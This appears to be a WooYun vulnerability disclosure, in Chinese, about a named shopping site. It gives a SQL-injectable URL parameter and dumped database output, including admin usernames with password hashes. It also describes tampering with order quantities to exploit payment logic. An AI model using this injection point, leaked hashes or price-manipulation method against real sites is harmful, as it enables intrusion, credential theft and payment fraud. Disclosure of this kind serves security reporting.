WooYun.org

SQL注入，可查看CDKey兑换码，订单信息，用户信息。。。。
支付逻辑漏洞，导致订单信息异常
先看sql注入，kw参数存在注入
http://www.shenmafuli.com/?a=productlist&c=About&fr=&kw=1

注入数据
current database: 'shenma'
current user: 'product_shenma@%'
Database: shenma
Table: admin
[8 entries]
+---------+----------------------------------+--------------+
| AdminID | Password | AdminName |
+---------+----------------------------------+--------------+
| 1 | 956e5d52bb96ec505c6dab91ec818f0f | shenma |
| 2 | 956e5d52bb96ec505c6dab91ec818f0f | xuesen |
| 3 | 956e5d52bb96ec505c6dab91ec818f0f | guolulu |
| 4 | 956e5d52bb96ec505c6dab91ec818f0f | shengyi |
| 5 | 956e5d52bb96ec505c6dab91ec818f0f | xuewei |
| 7 | 956e5d52bb96ec505c6dab91ec818f0f | liderui |
| 8 | 956e5d52bb96ec505c6dab91ec818f0f | jinhailan |
| 10 | 956e5d52bb96ec505c6dab91ec818f0f | zhangjingrui |
+---------+----------------------------------+--------------+
可以获取CDkey

不过这些兑换码好像都是用过的，，，，，，
也可以看到订单信息

然后是支付逻辑漏洞，支付提交的时候可以抓包修改订单数据，后台计算价格的方式是看单价和数量的乘积是否大于39，如果大于或等于则不计算邮费，如果小于则加上15元邮费。
首先下一个订单，

然后抓包修改物品数量

就会产生这样一个订单

如果数量改为负的那么金额也会是负的

如果是负的话订单是提交不成功的

但是可以稍微计算一下，使其刚刚大于零，就能提交成功，只是不知道这样的订单能不能通过呢~~